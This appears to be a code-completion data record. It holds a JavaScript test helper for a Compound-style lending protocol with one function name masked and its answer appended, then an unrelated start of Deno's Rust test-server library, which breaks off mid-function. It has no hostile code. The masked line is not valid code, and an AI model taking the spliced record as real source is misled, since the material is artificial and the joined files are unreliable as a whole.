const priceOracle = opts.priceOracle || await makePriceOracle(opts.priceOracleOpts);
const closeFactor = etherMantissa(dfn(opts.closeFactor, .051));
const maxAssets = etherUnsigned(dfn(opts.maxAssets, 10));
const liquidationIncentive = etherMantissa(1);
const comp = opts.comp || await deploy('Comp', [opts.compOwner || root]);
const compRate = etherUnsigned(dfn(opts.compRate, 1e18));
const compMarkets = opts.compMarkets || [];
const otherMarkets = opts.otherMarkets || [];
await send(unitroller, '_setPendingImplementation', [comptroller._address]);
await send(comptroller, '_become', [unitroller._address, compRate, compMarkets, otherMarkets]);
mergeInterface(unitroller, comptroller);
await send(unitroller, '_setLiquidationIncentive', [liquidationIncentive]);
await send(unitroller, '_setCloseFactor', [closeFactor]);
await send(unitroller, '_setMaxAssets', [maxAssets]);
await send(unitroller, '_setPriceOracle', [priceOracle._address]);
await send(unitroller, 'setCompAddress', [comp._address]); // harness only
return Object.assign(unitroller, { priceOracle, comp });
}
}
async function makeCToken(opts = {}) {
const {
root = saddle.account,
kind = 'cerc20'
} = opts || {};
const comptroller = opts.comptroller || await makeComptroller(opts.comptrollerOpts);
const interestRateModel = opts.interestRateModel || await makeInterestRateModel(opts.interestRateModelOpts);
const exchangeRate = etherMantissa(dfn(opts.exchangeRate, 1));
const decimals = etherUnsigned(dfn(opts.decimals, 8));
const symbol = opts.symbol || (kind === 'cether' ? 'cETH' : 'cOMG');
const name = opts.name || `CToken ${symbol}`;
const admin = opts.admin || root;
let cToken, underlying;
let cDelegator, cDelegatee, cDaiMaker;
switch (kind) {
case 'cether':
cToken = await deploy('CEtherHarness',
[
comptroller._address,
interestRateModel._address,
exchangeRate,
name,
symbol,
decimals,
admin
])
break;
case 'cdai':
cDaiMaker = await deploy('CDaiDelegateMakerHarness');
underlying = cDaiMaker;
cDelegatee = await deploy('CDaiDelegateHarness');
cDelegator = await deploy('CErc20Delegator',
[
underlying._address,
comptroller._address,
interestRateModel._address,
exchangeRate,
name,
symbol,
decimals,
admin,
cDelegatee._address,
encodeParameters(['address', 'address'], [cDaiMaker._address, cDaiMaker._address])
]
);
cToken = await saddle.getContractAt('CDaiDelegateHarness', cDelegator._address); // XXXS at
break;
case 'cerc20':
default:
underlying = opts.underlying || await makeToken(opts.underlyingOpts);
cDelegatee = await deploy('CErc20DelegateHarness');
cDelegator = await deploy('CErc20Delegator',
[
underlying._address,
comptroller._address,
interestRateModel._address,
exchangeRate,
name,
symbol,
decimals,
admin,
cDelegatee._address,
"0x0"
]
);
cToken = await saddle.getContractAt('CErc20DelegateHarness', cDelegator._address); // XXXS at
break;
}
if (opts.supportMarket) {
await send(comptroller, '_supportMarket', [cToken._address]);
}
if (opts.addCompMarket) {
await send(comptroller, '_addCompMarket', [cToken._address]);
}
if (opts.underlyingPrice) {
const price = etherMantissa(opts.underlyingPrice);
await send(comptroller.priceOracle, 'setUnderlyingPrice', [cToken._address, price]);
}
if (opts.collateralFactor) {
const factor = etherMantissa(opts.collateralFactor);
expect(await send(comptroller, '_setCollateralFactor', [cToken._address, factor])).toSucceed();
}
return Object.assign(cToken, { name, symbol, underlying, comptroller, interestRateModel });
}
async function makeInterestRateModel(opts = {}) {
const {
root = saddle.account,
kind = 'harnessed'
} = opts || {};
if (kind == 'harnessed') {
const borrowRate = etherMantissa(dfn(opts.borrowRate, 0));
return await deploy('InterestRateModelHarness', [borrowRate]);
}
if (kind == 'false-marker') {
const borrowRate = etherMantissa(dfn(opts.borrowRate, 0));
return await deploy('FalseMarkerMethodInterestRateModel', [borrowRate]);
}
if (kind == 'white-paper') {
const baseRate = etherMantissa(dfn(opts.baseRate, 0));
const multiplier = etherMantissa(dfn(opts.multiplier, 1e-18));
return await deploy('WhitePaperInterestRateModel', [baseRate, multiplier]);
}
if (kind == 'jump-rate') {
const baseRate = etherMantissa(dfn(opts.baseRate, 0));
const multiplier = etherMantissa(dfn(opts.multiplier, 1e-18));
const jump = etherMantissa(dfn(opts.jump, 0));
const kink = etherMantissa(dfn(opts.kink, 0));
return await deploy('JumpRateModel', [baseRate, multiplier, jump, kink]);
}
}
async function makePriceOracle(opts = {}) {
const {
root = saddle.account,
kind = 'simple'
} = opts || {};
if (kind == 'simple') {
return await deploy('SimplePriceOracle');
}
}
async function makeToken(opts = {}) {
const {
root = saddle.account,
kind = 'erc20'
} = opts || {};
if (kind == 'erc20') {
const quantity = etherUnsigned(dfn(opts.quantity, 1e25));
const decimals = etherUnsigned(dfn(opts.decimals, 18));
const symbol = opts.symbol || 'OMG';
const name = opts.name || `Erc20 ${symbol}`;
return await deploy('ERC20Harness', [quantity, name, decimals, symbol]);
}
}
async function balanceOf(token, account) {
return etherUnsigned(await call(token, 'balanceOf', [account]));
}
async function totalSupply(token) {
return etherUnsigned(await call(token, 'totalSupply'));
}
async function borrowSnapshot(cToken, account) {
const { principal, interestIndex } = await call(cToken, 'harnessAccountBorrows', [account]);
return { principal: etherUnsigned(principal), interestIndex: etherUnsigned(interestIndex) };
}
async function totalBorrows(cToken) {
return etherUnsigned(await call(cToken, 'totalBorrows'));
}
async function totalReserves(cToken) {
return etherUnsigned(await call(cToken, 'totalReserves'));
}
async function enterMarkets(cTokens, from) {
return await send(cTokens[0].comptroller, 'enterMarkets', [cTokens.map(c => c._address)], { from });
}
async function fastForward(cToken, blocks = 5) {
return await send(cToken, 'harnessFastForward', [blocks]);
}
async function setBalance(cToken, account, balance) {
return await send(cToken, 'harnessSetBalance', [account, balance]);
}
async function setEtherBalance(cEther, balance) {
const current = await etherBalance(cEther._address);
const root = saddle.account;
expect(await send(cEther, 'harnessDoTransferOut', [root, current])).toSucceed();
expect(await send(cEther, 'harnessDoTransferIn', [root, balance], { value: balance })).toSucceed();
}
async function getBalances(cTokens, accounts) {
const balances = {};
for (let cToken of cTokens) {
const cBalances = balances[cToken._address] = {};
for (let account of accounts) {
cBalances[account] = {
eth: await etherBalance(account),
cash: cToken.underlying && await balanceOf(cToken.underlying, account),
tokens: await balanceOf(cToken, account),
borrows: (await borrowSnapshot(cToken, account)).principal
};
}
cBalances[cToken._address] = {
eth: await etherBalance(cToken._address),
cash: cToken.underlying && await balanceOf(cToken.underlying, cToken._address),
tokens: await totalSupply(cToken),
borrows: await totalBorrows(cToken),
reserves: await totalReserves(cToken)
};
}
return balances;
}
async function | (balances, deltas) {
for (let delta of deltas) {
let cToken, account, key, diff;
if (delta.length == 4) {
([cToken, account, key, diff] = delta);
} else {
([cToken, key, diff] = delta);
account = cToken._address;
}
balances[cToken._address][account][key] = balances[cToken._address][account][key].add(diff);
}
return balances;
}
async function preApprove(cToken, from, amount, opts = {}) {
if (dfn(opts.faucet, true)) {
expect(await send(cToken.underlying, 'harnessSetBalance', [from, amount], { from })).toSucceed();
}
return send(cToken.underlying, 'approve', [cToken._address, amount], { from });
}
async function quickMint(cToken, minter, mintAmount, opts = {}) {
// make sure to accrue interest
await fastForward(cToken, 1);
if (dfn(opts.approve, true)) {
expect(await preApprove(cToken, minter, mintAmount, opts)).toSucceed();
}
if (dfn(opts.exchangeRate)) {
expect(await send(cToken, 'harnessSetExchangeRate', [etherMantissa(opts.exchangeRate)])).toSucceed();
}
return send(cToken, 'mint', [mintAmount], { from: minter });
}
async function preSupply(cToken, account, tokens, opts = {}) {
if (dfn(opts.total, true)) {
expect(await send(cToken, 'harnessSetTotalSupply', [tokens])).toSucceed();
}
return send(cToken, 'harnessSetBalance', [account, tokens]);
}
async function quickRedeem(cToken, redeemer, redeemTokens, opts = {}) {
await fastForward(cToken, 1);
if (dfn(opts.supply, true)) {
expect(await preSupply(cToken, redeemer, redeemTokens, opts)).toSucceed();
}
if (dfn(opts.exchangeRate)) {
expect(await send(cToken, 'harnessSetExchangeRate', [etherMantissa(opts.exchangeRate)])).toSucceed();
}
return send(cToken, 'redeem', [redeemTokens], { from: redeemer });
}
async function quickRedeemUnderlying(cToken, redeemer, redeemAmount, opts = {}) {
await fastForward(cToken, 1);
if (dfn(opts.exchangeRate)) {
expect(await send(cToken, 'harnessSetExchangeRate', [etherMantissa(opts.exchangeRate)])).toSucceed();
}
return send(cToken, 'redeemUnderlying', [redeemAmount], { from: redeemer });
}
async function setOraclePrice(cToken, price) {
return send(cToken.comptroller.priceOracle, 'setUnderlyingPrice', [cToken._address, etherMantissa(price)]);
}
async function setBorrowRate(cToken, rate) {
return send(cToken.interestRateModel, 'setBorrowRate', [etherMantissa(rate)]);
}
async function getBorrowRate(interestRateModel, cash, borrows, reserves) {
return call(interestRateModel, 'getBorrowRate', [cash, borrows, reserves].map(etherUnsigned));
}
async function getSupplyRate(interestRateModel, cash, borrows, reserves, reserveFactor) {
return call(interestRateModel, 'getSupplyRate', [cash, borrows, reserves, reserveFactor].map(etherUnsigned));
}
async function pretendBorrow(cToken, borrower, accountIndex, marketIndex, principalRaw, blockNumber = 2e7) {
await send(cToken, 'harnessSetTotalBorrows', [etherUnsigned(principalRaw)]);
await send(cToken, 'harnessSetAccountBorrows', [borrower, etherUnsigned(principalRaw), etherMantissa(accountIndex)]);
await send(cToken, 'harnessSetBorrowIndex', [etherMantissa(marketIndex)]);
await send(cToken, 'harnessSetAccrualBlockNumber', [etherUnsigned(blockNumber)]);
await send(cToken, 'harnessSetBlockNumber', [etherUnsigned(blockNumber)]);
}
module.exports = {
makeComptroller,
makeCToken,
makeInterestRateModel,
makePriceOracle,
makeToken,
balanceOf,
totalSupply,
borrowSnapshot,
totalBorrows,
totalReserves,
enterMarkets,
fastForward,
setBalance,
setEtherBalance,
getBalances,
adjustBalances,
preApprove,
quickMint,
preSupply,
quickRedeem,
quickRedeemUnderlying,
setOraclePrice,
setBorrowRate,
getBorrowRate,
getSupplyRate,
pretendBorrow
};
| adjustBalances |
lib.rs | // Copyright 2018-2021 the Deno authors. All rights reserved. MIT license.
// Usage: provide a port as argument to run hyper_hello benchmark server
// otherwise this starts multiple servers on many ports for test endpoints.
use anyhow::anyhow;
use futures::FutureExt;
use futures::Stream;
use futures::StreamExt;
use hyper::header::HeaderValue;
use hyper::server::Server;
use hyper::service::make_service_fn;
use hyper::service::service_fn;
use hyper::Body;
use hyper::Request;
use hyper::Response;
use hyper::StatusCode;
use lazy_static::lazy_static;
use os_pipe::pipe;
use regex::Regex;
use rustls::Certificate;
use rustls::PrivateKey;
use serde::Serialize;
use std::collections::HashMap;
use std::convert::Infallible;
use std::env;
use std::io;
use std::io::Read;
use std::io::Write;
use std::mem::replace;
use std::net::SocketAddr;
use std::path::PathBuf;
use std::pin::Pin;
use std::process::Child;
use std::process::Command;
use std::process::Output;
use std::process::Stdio;
use std::result::Result;
use std::sync::Arc;
use std::sync::Mutex;
use std::sync::MutexGuard;
use std::task::Context;
use std::task::Poll;
use tempfile::TempDir;
use tokio::io::AsyncWriteExt;
use tokio::net::TcpListener;
use tokio::net::TcpStream;
use tokio_rustls::rustls;
use tokio_rustls::TlsAcceptor;
use tokio_tungstenite::accept_async;
pub mod lsp;
pub mod pty;
const PORT: u16 = 4545;
const TEST_AUTH_TOKEN: &str = "abcdef123456789";
const TEST_BASIC_AUTH_USERNAME: &str = "testuser123";
const TEST_BASIC_AUTH_PASSWORD: &str = "testpassabc";
const REDIRECT_PORT: u16 = 4546;
const ANOTHER_REDIRECT_PORT: u16 = 4547;
const DOUBLE_REDIRECTS_PORT: u16 = 4548;
const INF_REDIRECTS_PORT: u16 = 4549;
const REDIRECT_ABSOLUTE_PORT: u16 = 4550;
const AUTH_REDIRECT_PORT: u16 = 4551;
const TLS_CLIENT_AUTH_PORT: u16 = 4552;
const BASIC_AUTH_REDIRECT_PORT: u16 = 4554;
const TLS_PORT: u16 = 4557;
const HTTPS_PORT: u16 = 5545;
const H1_ONLY_PORT: u16 = 5546;
const H2_ONLY_PORT: u16 = 5547;
const HTTPS_CLIENT_AUTH_PORT: u16 = 5552;
const WS_PORT: u16 = 4242;
const WSS_PORT: u16 = 4243;
const WS_CLOSE_PORT: u16 = 4244;
pub const PERMISSION_VARIANTS: [&str; 5] =
["read", "write", "env", "net", "run"];
pub const PERMISSION_DENIED_PATTERN: &str = "PermissionDenied";
lazy_static! {
// STRIP_ANSI_RE and strip_ansi_codes are lifted from the "console" crate.
// Copyright 2017 Armin Ronacher <[email protected]>. MIT License.
static ref STRIP_ANSI_RE: Regex = Regex::new(
r"[\x1b\x9b][\[()#;?]*(?:[0-9]{1,4}(?:;[0-9]{0,4})*)?[0-9A-PRZcf-nqry=><]"
).unwrap();
static ref GUARD: Mutex<HttpServerCount> = Mutex::new(HttpServerCount::default());
}
pub fn root_path() -> PathBuf {
PathBuf::from(concat!(env!("CARGO_MANIFEST_DIR")))
.parent()
.unwrap()
.to_path_buf()
}
pub fn prebuilt_path() -> PathBuf {
third_party_path().join("prebuilt")
}
pub fn tests_path() -> PathBuf {
root_path().join("cli").join("tests")
}
pub fn testdata_path() -> PathBuf {
tests_path().join("testdata")
}
pub fn third_party_path() -> PathBuf {
root_path().join("third_party")
}
pub fn std_path() -> PathBuf {
root_path().join("test_util").join("std")
}
pub fn target_dir() -> PathBuf {
let current_exe = std::env::current_exe().unwrap();
let target_dir = current_exe.parent().unwrap().parent().unwrap();
target_dir.into()
}
pub fn deno_exe_path() -> PathBuf {
// Something like /Users/rld/src/deno/target/debug/deps/deno
let mut p = target_dir().join("deno");
if cfg!(windows) {
p.set_extension("exe");
}
p
}
pub fn prebuilt_tool_path(tool: &str) -> PathBuf {
let mut exe = tool.to_string();
exe.push_str(if cfg!(windows) { ".exe" } else { "" });
prebuilt_path().join(platform_dir_name()).join(exe)
}
fn platform_dir_name() -> &'static str {
if cfg!(target_os = "linux") {
"linux64"
} else if cfg!(target_os = "macos") {
"mac"
} else if cfg!(target_os = "windows") {
"win"
} else {
unreachable!()
}
}
pub fn test_server_path() -> PathBuf {
let mut p = target_dir().join("test_server");
if cfg!(windows) {
p.set_extension("exe");
}
p
}
fn ensure_test_server_built() {
// if the test server doesn't exist then remind the developer to build first
if !test_server_path().exists() {
panic!(
"Test server not found. Please cargo build before running the tests."
);
}
}
/// Benchmark server that just serves "hello world" responses.
async fn hyper_hello(port: u16) {
println!("hyper hello");
let addr = SocketAddr::from(([127, 0, 0, 1], port));
let hello_svc = make_service_fn(|_| async move {
Ok::<_, Infallible>(service_fn(move |_: Request<Body>| async move {
Ok::<_, Infallible>(Response::new(Body::from("Hello World!")))
}))
});
let server = Server::bind(&addr).serve(hello_svc);
if let Err(e) = server.await {
eprintln!("server error: {}", e);
}
}
fn redirect_resp(url: String) -> Response<Body> {
let mut redirect_resp = Response::new(Body::empty());
*redirect_resp.status_mut() = StatusCode::MOVED_PERMANENTLY;
redirect_resp.headers_mut().insert(
hyper::header::LOCATION,
HeaderValue::from_str(&url[..]).unwrap(),
);
redirect_resp
}
async fn redirect(req: Request<Body>) -> hyper::Result<Response<Body>> {
let p = req.uri().path();
assert_eq!(&p[0..1], "/");
let url = format!("http://localhost:{}{}", PORT, p);
Ok(redirect_resp(url))
}
async fn double_redirects(req: Request<Body>) -> hyper::Result<Response<Body>> {
let p = req.uri().path();
assert_eq!(&p[0..1], "/");
let url = format!("http://localhost:{}{}", REDIRECT_PORT, p);
Ok(redirect_resp(url))
}
async fn inf_redirects(req: Request<Body>) -> hyper::Result<Response<Body>> {
let p = req.uri().path();
assert_eq!(&p[0..1], "/");
let url = format!("http://localhost:{}{}", INF_REDIRECTS_PORT, p);
Ok(redirect_resp(url))
}
async fn another_redirect(req: Request<Body>) -> hyper::Result<Response<Body>> {
let p = req.uri().path();
assert_eq!(&p[0..1], "/");
let url = format!("http://localhost:{}/subdir{}", PORT, p);
Ok(redirect_resp(url))
}
async fn auth_redirect(req: Request<Body>) -> hyper::Result<Response<Body>> {
if let Some(auth) = req
.headers()
.get("authorization")
.map(|v| v.to_str().unwrap())
{
if auth.to_lowercase() == format!("bearer {}", TEST_AUTH_TOKEN) {
let p = req.uri().path();
assert_eq!(&p[0..1], "/");
let url = format!("http://localhost:{}{}", PORT, p);
return Ok(redirect_resp(url));
}
}
let mut resp = Response::new(Body::empty());
*resp.status_mut() = StatusCode::NOT_FOUND;
Ok(resp)
}
async fn basic_auth_redirect(
req: Request<Body>,
) -> hyper::Result<Response<Body>> {
if let Some(auth) = req
.headers()
.get("authorization")
.map(|v| v.to_str().unwrap())
{
let credentials =
format!("{}:{}", TEST_BASIC_AUTH_USERNAME, TEST_BASIC_AUTH_PASSWORD);
if auth == format!("Basic {}", base64::encode(credentials)) {
let p = req.uri().path();
assert_eq!(&p[0..1], "/");
let url = format!("http://localhost:{}{}", PORT, p);
return Ok(redirect_resp(url));
}
}
let mut resp = Response::new(Body::empty());
*resp.status_mut() = StatusCode::NOT_FOUND;
Ok(resp)
}
async fn run_ws_server(addr: &SocketAddr) {
let listener = TcpListener::bind(addr).await.unwrap();
println!("ready: ws"); // Eye catcher for HttpServerCount
while let Ok((stream, _addr)) = listener.accept().await {
tokio::spawn(async move {
let ws_stream_fut = accept_async(stream);
let ws_stream = ws_stream_fut.await;
if let Ok(ws_stream) = ws_stream {
let (tx, rx) = ws_stream.split();
rx.forward(tx)
.map(|result| {
if let Err(e) = result {
println!("websocket server error: {:?}", e);
}
})
.await;
}
});
}
}
async fn run_ws_close_server(addr: &SocketAddr) {
let listener = TcpListener::bind(addr).await.unwrap();
while let Ok((stream, _addr)) = listener.accept().await {
tokio::spawn(async move {
let ws_stream_fut = accept_async(stream);
let ws_stream = ws_stream_fut.await;
if let Ok(mut ws_stream) = ws_stream {
ws_stream.close(None).await.unwrap();
}
});
}
}
enum SupportedHttpVersions {
All,
Http1Only,
Http2Only,
}
impl Default for SupportedHttpVersions {
fn default() -> SupportedHttpVersions {
SupportedHttpVersions::All
}
}
async fn get_tls_config(
cert: &str,
key: &str,
ca: &str,
http_versions: SupportedHttpVersions,
) -> io::Result<Arc<rustls::ServerConfig>> {
let cert_path = testdata_path().join(cert);
let key_path = testdata_path().join(key);
let ca_path = testdata_path().join(ca);
let cert_file = std::fs::File::open(cert_path)?;
let key_file = std::fs::File::open(key_path)?;
let ca_file = std::fs::File::open(ca_path)?;
let certs: Vec<Certificate> = {
let mut cert_reader = io::BufReader::new(cert_file);
rustls_pemfile::certs(&mut cert_reader)
.unwrap()
.into_iter()
.map(Certificate)
.collect()
};
let mut ca_cert_reader = io::BufReader::new(ca_file);
let ca_cert = rustls_pemfile::certs(&mut ca_cert_reader)
.expect("Cannot load CA certificate")
.remove(0);
let mut key_reader = io::BufReader::new(key_file);
let key = {
let pkcs8_key = rustls_pemfile::pkcs8_private_keys(&mut key_reader)
.expect("Cannot load key file");
let rsa_key = rustls_pemfile::rsa_private_keys(&mut key_reader)
.expect("Cannot load key file");
if !pkcs8_key.is_empty() {
Some(pkcs8_key[0].clone())
} else if !rsa_key.is_empty() {
Some(rsa_key[0].clone())
} else {
None
}
};
match key {
Some(key) => {
let mut root_cert_store = rustls::RootCertStore::empty();
root_cert_store.add(&rustls::Certificate(ca_cert)).unwrap();
// Allow (but do not require) client authentication.
let mut config = rustls::ServerConfig::builder()
.with_safe_defaults()
.with_client_cert_verifier(
rustls::server::AllowAnyAnonymousOrAuthenticatedClient::new(
root_cert_store,
),
)
.with_single_cert(certs, PrivateKey(key))
.map_err(|e| {
anyhow!("Error setting cert: {:?}", e);
})
.unwrap();
match http_versions {
SupportedHttpVersions::All => {
config.alpn_protocols = vec!["h2".into(), "http/1.1".into()];
}
SupportedHttpVersions::Http1Only => {}
SupportedHttpVersions::Http2Only => {
config.alpn_protocols = vec!["h2".into()];
}
}
Ok(Arc::new(config))
}
None => Err(io::Error::new(io::ErrorKind::Other, "Cannot find key")),
}
}
async fn run_wss_server(addr: &SocketAddr) {
let cert_file = "tls/localhost.crt";
let key_file = "tls/localhost.key";
let ca_cert_file = "tls/RootCA.pem";
let tls_config =
get_tls_config(cert_file, key_file, ca_cert_file, Default::default())
.await
.unwrap();
let tls_acceptor = TlsAcceptor::from(tls_config);
let listener = TcpListener::bind(addr).await.unwrap();
println!("ready: wss"); // Eye catcher for HttpServerCount
while let Ok((stream, _addr)) = listener.accept().await {
let acceptor = tls_acceptor.clone();
tokio::spawn(async move {
match acceptor.accept(stream).await {
Ok(tls_stream) => {
let ws_stream_fut = accept_async(tls_stream);
let ws_stream = ws_stream_fut.await;
if let Ok(ws_stream) = ws_stream {
let (tx, rx) = ws_stream.split();
rx.forward(tx)
.map(|result| {
if let Err(e) = result {
println!("Websocket server error: {:?}", e);
}
})
.await;
}
}
Err(e) => {
eprintln!("TLS accept error: {:?}", e);
}
}
});
}
}
/// This server responds with 'PASS' if client authentication was successful. Try it by running
/// test_server and
/// curl --key cli/tests/testdata/tls/localhost.key \
/// --cert cli/tests/testsdata/tls/localhost.crt \
/// --cacert cli/tests/testdata/tls/RootCA.crt https://localhost:4552/
async fn run_tls_client_auth_server() {
let cert_file = "tls/localhost.crt";
let key_file = "tls/localhost.key";
let ca_cert_file = "tls/RootCA.pem";
let tls_config =
get_tls_config(cert_file, key_file, ca_cert_file, Default::default())
.await
.unwrap();
let tls_acceptor = TlsAcceptor::from(tls_config);
// Listen on ALL addresses that localhost can resolves to.
let accept = |listener: tokio::net::TcpListener| {
async {
let result = listener.accept().await;
Some((result, listener))
}
.boxed()
};
let host_and_port = &format!("localhost:{}", TLS_CLIENT_AUTH_PORT);
let listeners = tokio::net::lookup_host(host_and_port)
.await
.expect(host_and_port)
.inspect(|address| println!("{} -> {}", host_and_port, address))
.map(tokio::net::TcpListener::bind)
.collect::<futures::stream::FuturesUnordered<_>>()
.collect::<Vec<_>>()
.await
.into_iter()
.map(|s| s.unwrap())
.map(|listener| futures::stream::unfold(listener, accept))
.collect::<Vec<_>>();
println!("ready: tls client auth"); // Eye catcher for HttpServerCount
let mut listeners = futures::stream::select_all(listeners);
while let Some(Ok((stream, _addr))) = listeners.next().await {
let acceptor = tls_acceptor.clone();
tokio::spawn(async move {
match acceptor.accept(stream).await {
Ok(mut tls_stream) => {
let (_, tls_session) = tls_stream.get_mut();
// We only need to check for the presence of client certificates
// here. Rusttls ensures that they are valid and signed by the CA.
let response = match tls_session.peer_certificates() {
Some(_certs) => b"PASS",
None => b"FAIL",
};
tls_stream.write_all(response).await.unwrap();
}
Err(e) => {
eprintln!("TLS accept error: {:?}", e);
}
}
});
}
}
/// This server responds with 'PASS' if client authentication was successful. Try it by running
/// test_server and
/// curl --cacert cli/tests/testdata/tls/RootCA.crt https://localhost:4553/
async fn run_tls_server() {
let cert_file = "tls/localhost.crt";
let key_file = "tls/localhost.key";
let ca_cert_file = "tls/RootCA.pem";
let tls_config =
get_tls_config(cert_file, key_file, ca_cert_file, Default::default())
.await
.unwrap();
let tls_acceptor = TlsAcceptor::from(tls_config);
// Listen on ALL addresses that localhost can resolves to.
let accept = |listener: tokio::net::TcpListener| {
async {
let result = listener.accept().await;
Some((result, listener))
}
.boxed()
};
let host_and_port = &format!("localhost:{}", TLS_PORT);
let listeners = tokio::net::lookup_host(host_and_port)
.await
.expect(host_and_port)
.inspect(|address| println!("{} -> {}", host_and_port, address))
.map(tokio::net::TcpListener::bind)
.collect::<futures::stream::FuturesUnordered<_>>()
.collect::<Vec<_>>()
.await
.into_iter()
.map(|s| s.unwrap())
.map(|listener| futures::stream::unfold(listener, accept))
.collect::<Vec<_>>();
println!("ready: tls"); // Eye catcher for HttpServerCount
let mut listeners = futures::stream::select_all(listeners);
while let Some(Ok((stream, _addr))) = listeners.next().await {
let acceptor = tls_acceptor.clone();
tokio::spawn(async move {
match acceptor.accept(stream).await {
Ok(mut tls_stream) => {
tls_stream.write_all(b"PASS").await.unwrap();
}
Err(e) => {
eprintln!("TLS accept error: {:?}", e);
}
}
});
}
}
async fn absolute_redirect(
req: Request<Body>,
) -> hyper::Result<Response<Body>> {
let path = req.uri().path();
if path.starts_with("/REDIRECT") {
let url = &req.uri().path()[9..];
println!("URL: {:?}", url);
let redirect = redirect_resp(url.to_string());
return Ok(redirect);
}
if path.starts_with("/a/b/c") {
if let Some(x_loc) = req.headers().get("x-location") {
let loc = x_loc.to_str().unwrap();
return Ok(redirect_resp(loc.to_string()));
}
}
let mut file_path = testdata_path();
file_path.push(&req.uri().path()[1..]);
if file_path.is_dir() || !file_path.exists() {
let mut not_found_resp = Response::new(Body::empty());
*not_found_resp.status_mut() = StatusCode::NOT_FOUND;
return Ok(not_found_resp);
}
let file = tokio::fs::read(file_path).await.unwrap();
let file_resp = custom_headers(req.uri().path(), file);
Ok(file_resp)
}
async fn main_server(
req: Request<Body>,
) -> Result<Response<Body>, hyper::http::Error> {
return match (req.method(), req.uri().path()) {
(&hyper::Method::POST, "/echo_server") => {
let (parts, body) = req.into_parts();
let mut response = Response::new(body);
if let Some(status) = parts.headers.get("x-status") {
*response.status_mut() =
StatusCode::from_bytes(status.as_bytes()).unwrap();
}
if let Some(content_type) = parts.headers.get("content-type") {
response
.headers_mut()
.insert("content-type", content_type.clone());
}
if let Some(user_agent) = parts.headers.get("user-agent") {
response
.headers_mut()
.insert("user-agent", user_agent.clone());
}
Ok(response)
}
(&hyper::Method::POST, "/echo_multipart_file") => {
let body = req.into_body();
let bytes = &hyper::body::to_bytes(body).await.unwrap()[0..];
let start = b"--boundary\t \r\n\
Content-Disposition: form-data; name=\"field_1\"\r\n\
\r\n\
value_1 \r\n\
\r\n--boundary\r\n\
Content-Disposition: form-data; name=\"file\"; \
filename=\"file.bin\"\r\n\
Content-Type: application/octet-stream\r\n\
\r\n";
let end = b"\r\n--boundary--\r\n";
let b = [start as &[u8], bytes, end].concat();
let mut response = Response::new(Body::from(b));
response.headers_mut().insert(
"content-type",
HeaderValue::from_static("multipart/form-data;boundary=boundary"),
);
Ok(response)
}
(_, "/multipart_form_data.txt") => {
let b = "Preamble\r\n\
--boundary\t \r\n\
Content-Disposition: form-data; name=\"field_1\"\r\n\
\r\n\
value_1 \r\n\
\r\n--boundary\r\n\
Content-Disposition: form-data; name=\"field_2\";\
filename=\"file.js\"\r\n\
Content-Type: text/javascript\r\n\
\r\n\
console.log(\"Hi\")\
\r\n--boundary--\r\n\
Epilogue";
let mut res = Response::new(Body::from(b));
res.headers_mut().insert(
"content-type",
HeaderValue::from_static("multipart/form-data;boundary=boundary"),
);
Ok(res)
}
(_, "/multipart_form_bad_content_type") => {
let b = "Preamble\r\n\
--boundary\t \r\n\
Content-Disposition: form-data; name=\"field_1\"\r\n\
\r\n\
value_1 \r\n\
\r\n--boundary\r\n\
Content-Disposition: form-data; name=\"field_2\";\
filename=\"file.js\"\r\n\
Content-Type: text/javascript\r\n\
\r\n\
console.log(\"Hi\")\
\r\n--boundary--\r\n\
Epilogue";
let mut res = Response::new(Body::from(b));
res.headers_mut().insert(
"content-type",
HeaderValue::from_static("multipart/form-datatststs;boundary=boundary"),
);
Ok(res)
}
(_, "/bad_redirect") => {
let mut res = Response::new(Body::empty());
*res.status_mut() = StatusCode::FOUND;
Ok(res)
}
(_, "/non_ascii_redirect") => {
let mut res = Response::new(Body::empty());
*res.status_mut() = StatusCode::MOVED_PERMANENTLY;
res.headers_mut().insert(
"location",
HeaderValue::from_bytes(b"/redirect\xae").unwrap(),
);
Ok(res)
}
(_, "/etag_script.ts") => {
let if_none_match = req.headers().get("if-none-match");
if if_none_match == Some(&HeaderValue::from_static("33a64df551425fcc55e"))
{
let mut resp = Response::new(Body::empty());
*resp.status_mut() = StatusCode::NOT_MODIFIED;
resp.headers_mut().insert(
"Content-type",
HeaderValue::from_static("application/typescript"),
);
resp
.headers_mut()
.insert("ETag", HeaderValue::from_static("33a64df551425fcc55e"));
Ok(resp)
} else {
let mut resp = Response::new(Body::from("console.log('etag')"));
resp.headers_mut().insert(
"Content-type",
HeaderValue::from_static("application/typescript"),
);
resp
.headers_mut()
.insert("ETag", HeaderValue::from_static("33a64df551425fcc55e"));
Ok(resp)
}
}
(_, "/xTypeScriptTypes.js") => {
let mut res = Response::new(Body::from("export const foo = 'foo';"));
res.headers_mut().insert(
"Content-type",
HeaderValue::from_static("application/javascript"),
);
res.headers_mut().insert(
"X-TypeScript-Types",
HeaderValue::from_static("./xTypeScriptTypes.d.ts"),
);
Ok(res)
}
(_, "/xTypeScriptTypes.jsx") => {
let mut res = Response::new(Body::from("export const foo = 'foo';"));
res
.headers_mut()
.insert("Content-type", HeaderValue::from_static("text/jsx"));
res.headers_mut().insert(
"X-TypeScript-Types",
HeaderValue::from_static("./xTypeScriptTypes.d.ts"),
);
Ok(res)
}
(_, "/xTypeScriptTypes.ts") => {
let mut res =
Response::new(Body::from("export const foo: string = 'foo';"));
res.headers_mut().insert(
"Content-type",
HeaderValue::from_static("application/typescript"),
);
res.headers_mut().insert(
"X-TypeScript-Types",
HeaderValue::from_static("./xTypeScriptTypes.d.ts"),
);
Ok(res)
}
(_, "/xTypeScriptTypes.d.ts") => {
let mut res = Response::new(Body::from("export const foo: 'foo';"));
res.headers_mut().insert(
"Content-type",
HeaderValue::from_static("application/typescript"),
);
Ok(res)
}
(_, "/type_directives_redirect.js") => {
let mut res = Response::new(Body::from("export const foo = 'foo';"));
res.headers_mut().insert(
"Content-type",
HeaderValue::from_static("application/javascript"),
);
res.headers_mut().insert(
"X-TypeScript-Types",
HeaderValue::from_static(
"http://localhost:4547/xTypeScriptTypesRedirect.d.ts",
),
);
Ok(res)
}
(_, "/type_headers_deno_types.foo.js") => {
let mut res = Response::new(Body::from(
"export function foo(text) { console.log(text); }",
));
res.headers_mut().insert(
"Content-type",
HeaderValue::from_static("application/javascript"),
);
res.headers_mut().insert(
"X-TypeScript-Types",
HeaderValue::from_static(
"http://localhost:4545/type_headers_deno_types.d.ts",
),
);
Ok(res)
}
(_, "/type_headers_deno_types.d.ts") => {
let mut res =
Response::new(Body::from("export function foo(text: number): void;"));
